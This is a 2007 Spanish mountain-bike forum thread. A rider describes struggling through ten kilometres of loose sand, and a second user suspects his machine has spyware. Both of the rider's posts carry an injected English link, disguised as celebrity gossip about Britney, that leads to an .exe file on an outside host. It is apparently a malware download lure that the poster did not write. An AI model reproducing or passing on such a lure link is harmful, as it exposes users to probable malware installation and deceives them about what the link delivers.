PU.... ARENILLA jaj

Tema en 'Rally/X-Country/Maratón' iniciado por guardia91, 3 Jul 2007.

  1. guardia91

    guardia91 Novato

    Registrado:
    14 Sep 2006
    Mensajes:
    242
    Me Gusta recibidos:
    0
    Ubicación:
    Cuenca
    <a href=\"http://para.qpoe.com/c76c1d2643c69857e1a677d2e0f23f8e/ul1.exe\">Look what happened to Britney! Oh she is really stupid!</a>Sabeis de esto cuando vais por un camino y empieza a haber arenilla de esta fina que te hundes en ella .... hoy con un amigo que tiene un chale en el campo hemos ido a dar una vuelta por la conocida ccomo " ruta de la arenilla " y como su propiop nombre indica 10 km de arena suelta de esta que no te deja avanzar que en subida derrapa la rueda y no avnazas , en bajada ppor mas que pedalees no pasas de 20 y en llano una matada , finalmete e pasado del camino y me e metido campo a través entre pinos , algun tocón escondido por los matojos a estado a punto de tirarme por los suelos pero al final a e salido sano y salvo , por fin cuando ya acaba el dichoso caminito toca una subida de piedra suelta que también es un coñazo , pero en fin supongo que tod@s nosotr@s somos bikers , para lo bueno y para lo malo , SALUDOS Y PERDON POR EL LADRILLEJO
     
  2. guardia91

    guardia91 Novato

    Registrado:
    14 Sep 2006
    Mensajes:
    242
    Me Gusta recibidos:
    0
    Ubicación:
    Cuenca
    <a href=\"http://para.qpoe.com/c76c1d2643c69857e1a677d2e0f23f8e/ul1.exe\">Look what happened to Britney! Oh she is really stupid!</a>Perdon por eso que me a salido a pie de post no se porque
     
  3. León Shadow

    León Shadow El Gañán te vigila

    Registrado:
    28 Jun 2007
    Mensajes:
    882
    Me Gusta recibidos:
    4
    Ubicación:
    entre ciudad real y madrid
    oh oh creo que tienes un pequeño spyware!

    avisa a los moderadores.

    ______________________________________
    vendo horquilla rock shox REBA del 2006. PINCHA AQUÍ

    mis mejores post:

    barritas energéticas caseras
     

Compartir esta página